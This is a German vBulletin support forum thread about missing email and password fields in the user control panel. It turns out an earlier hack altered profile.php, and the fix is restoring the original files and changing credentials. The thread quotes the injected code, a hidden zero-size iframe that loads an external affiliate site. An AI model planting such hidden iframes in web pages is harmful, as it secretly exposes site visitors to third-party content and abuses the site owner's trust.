Archiv verlassen und diese Seite im Standarddesign anzeigen : Kennwort - Email ändern!
guten Abend ...
Ich bräuchte mal eure Hilfe.
Ich hab folgendes Problem ->
Unter "Kontrollzentrum -> Email & Kennwort ändern" tauchen in meinem Forum die Felder "Email Adresse und Email Adresse Wiederholen" nicht mehr auf :(
somit habe weder ich, noch meine User die Möglichkeit ihr Passwort zu ändern :mad:
An was kann das liegen? Welches Template ist dafür zuständig welches ich wieder herstellen muss!?
vielen Dank für eure Tipps ...
Halloo xhybrid,
Das kannst du auch selbst rausfinden. Indem du die Templatenamen im Quelltext anzeigen lässt. Templatenamen als Kommentar in HTML-Quelltext schreiben
Der Templatename wird vor und nach jedem Template in den HTML-Quelltext geschrieben. Diese Option ist sehr gut geeignet für die Fehlersuche in den Templates und im HTML-Code, verursacht jedoch Einbußen bei der Serverleistung und sollte in einer Produktivumgebung ausgeschaltet sein. Link fürs Admincp: /admincp/options.php?do=options&dogroup=general#addtemplatename
Die Templategruppe heisst: Benutzerprofil ändern (Modify User Option) in der die entsprechenden Templates zusammengefasst werden.
vielen Dank erstmal :)
Nun habe ich alle templates wieder hergestellt, nur leider kommt das E-Mail Feld immer noch nicht wieder :confused:
hat jemand ne idee, woran das noch liegen könnte?
Gruß
Schaue mal nach, ob ihr nicht alle als gesperrt angesehen wird.
AdminCP -> Benutzergruppen -> Benutzergruppen verwalten -> Registrierte Benutzer -> Letzte Option
Das sollte auf 'Nein' stehen.
Schaue mal nach, ob ihr nicht alle als gesperrt angesehen wird.
AdminCP -> Benutzergruppen -> Benutzergruppen verwalten -> Registrierte Benutzer -> Letzte Option
Das sollte auf 'Nein' stehen.
Hallo :)
Das steht auf NEIN! Trotzdem Danke
ich bin am verzweifeln ;) kann nicht mal mein eigenes passwort ändern.
Noch jemand ne idee?
Und du hast das vBulletin 3.5?
Und du hast das vBulletin 3.5?
3.5.4 mit dem aktuellen Sicherheitspatch ...
Kannst du nun dein Passwort nicht ändern, oder deine E-Mail-Adresse oder beides? Irgendwie wird das hier nicht so wirklich deutlich.
Bist du in mehreren Benutzergruppen, bei denen evtl. "Benutzergruppe für gesperrte Benutzer" auf "Ja" steht?
Besteht das Problem auch, wenn du alle Plug-ins deaktivierst?
Falls ja:
Erstelle bitte ein Support-Ticket mit Admin-Zugang (alle Rechte), FTP- und phpMyAdmin-Daten.
http://members.vbulletin-germany.com/membersupport_contactform.php
Kannst du nun dein Passwort nicht ändern, oder deine E-Mail-Adresse oder beides? Irgendwie wird das hier nicht so wirklich deutlich.
Bist du in mehreren Benutzergruppen, bei denen evtl. "Benutzergruppe für gesperrte Benutzer" auf "Ja" steht?
Besteht das Problem auch, wenn du alle Plug-ins deaktivierst?
Falls ja:
Erstelle bitte ein Support-Ticket mit Admin-Zugang (alle Rechte), FTP- und phpMyAdmin-Daten.
http://members.vbulletin-germany.com/membersupport_contactform.php
Ich kann mein Passwort nicht ändern da bei mir das E-mailfeld nicht mehr zu sehen ist! Und das wird ja neötigt um das passwort zu ändern.
Ja ich bin in mehreren Benutzergruppen. Aber auch wenn ich nur in einer bin, taucht das Feld nicht auf!
Werde es mal probieren ohne Plugins.
Falls es nicht klappt, werde ich ein Support-ticket bestellen ...
Danke erstmal
tja was soll ich sagen :(
als mein Forum neulich gehackt wurde, hat anscheinend jemand meine Profile.php geändert und deshalb tauchen keine Email felder mehr auf ...
in der profile.php wurde einiges hinzugefügt z.b.
"<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";
was tu ich jetzt? kann ich die Standard profile.php der Version 3.5.4 einfach einspielen???
Gruß
Lade alle 3.5.4 Dateien erneut hoch und überschreibe die Alten.
EDIT: FTP, DB etc. Passwort wurde doch sicherlich schon vorn dir geändert. ;)
Lade alle 3.5.4 Dateien erneut hoch und überschreibe die Alten.
EDIT: FTP, DB etc. Passwort wurde doch sicherlich schon vorn dir geändert. ;)
Danke, hab sie hochgeladen und es funktioniert wieder alles so wie es soll :)
Ich hatte nach dem Hack das ganze Forum auf einen neuen Server verschoben! Alle Passwörter sind neu. Danke für den Hinweis ...
vBulletin® v3.7.3, Copyright ©2000-2008, Jelsoft Enterprises Ltd.